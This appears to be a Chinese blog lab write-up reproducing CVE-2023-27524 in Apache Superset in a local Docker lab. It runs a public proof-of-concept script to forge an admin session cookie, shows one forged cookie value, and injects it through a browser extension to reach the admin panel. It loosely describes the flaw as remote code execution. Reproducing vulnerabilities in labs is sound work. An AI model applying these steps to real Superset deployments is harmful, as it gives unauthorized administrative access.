当前位置: 首页 > java >正文

ApacheSuperset CVE-2023-27524

java 2025/6/29 13:22:42

前言:CVE-2023-27524 是一种远程代码执行漏洞,攻击者通过该漏洞可在受影响系统上执行任意代码,从而获得未授权访问权

CVE-2023-27524 GitHubhttps://github.com/horizon3ai/CVE-2023-27524

任务一 代理 | 拉取镜像

vi /etc/proxychains4.conf
//最下面修改真机IP端口

 

 

docker compose up -d
docker ps
//拉取成功后查看8088就是服务器端口

 任务二  python 问题解决

python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//发现缺少 ‘flask_unsign’

python3 -m venv myenv
source myenv/bin/activate
//创建并激活一个虚拟环境
//安装 flask-unsign
proxychains4 pip install flask-unsign

任务三 生成cookie

python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//下面这样就是安装成功了【eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.aEAshA.TmTRYFed6TPxFmeOmLRrQAXX3vc】

任务四 替换cookie 

//随便下载一个cookie的小插件 我用的是cookieManage

//替换进去保存,刷新一下就进管理界面了

 

任务五 实验结束 

http://www.xdnf.cn/news/11823.html

相关文章:

  • 阿里云ACP云计算备考笔记 (3)——云服务器ECS
  • 【趣味Html】第11课:动态闪烁发光粒子五角星博客
  • 如何使用 HTML、CSS 和 JavaScript 随机更改图片颜色
  • 什么是预构建,Vite中如何使用预构建
  • 【时时三省】(C语言基础)一维数组名作函数参数
  • 【EasyExcel】导出时添加页眉页脚
  • 第 86 场周赛:矩阵中的幻方、钥匙和房间、将数组拆分成斐波那契序列、猜猜这个单词
  • 华为手机开机卡在Huawei界面不动怎么办?
  • 美业破局:AI智能体如何用数据重塑战略决策(5/6)
  • Python爬虫(48)基于Scrapy-Redis与深度强化学习的智能分布式爬虫架构设计与实践
  • 从OSI到TCP/IP:网络协议的演变与作用
  • django paramiko 跳转登录
  • 2025年Splunk的替代方案:更智能的安全选择
  • ubuntu 常用操作指令(与域控制器交互相关)
  • 【HarmonyOS Next之旅】DevEco Studio使用指南(三十)
  • vimadbgit命令
  • Web后端开发(SpringBootWeb、HTTP、Tomcat快速入门)
  • 2025 5 月 学习笔记
  • 大数据Spark(六十一):Spark基于Standalone提交任务流程
  • WPF开发分页控件:实现可定制化分页功能及实现原理解析
  • 弹出层blockui插件主要使用blockUI和unblockUI两个方法来控制弹出层的显示或者隐藏
  • 【022】Vue+Springboot+mysql汽车销售系统课设(含源码、数据库、运行教程、实验报告)
  • 无处不在的开源 五十个开源存储软件
  • 奇迹MU开服服务端租用服务器架设搭建
  • 口袋参谋:一键查询任意买家旺旺号,规避被降权风险!
  • 【知识拓展】字符编码 {Unicode和GBK字符编码方案;UTF-8,UTF-16,UTF-32存储方案;char,wchar_t,char8_t,char16_t,char32_t字符类型}
  • 常见工具识别集锦---Windows应急响应工具
  • 标准中文电码简介
  • Python高阶函数extract + extractall详解与实例
  • 八种用Python实现定时执行任务的方案,一定有你用得到的!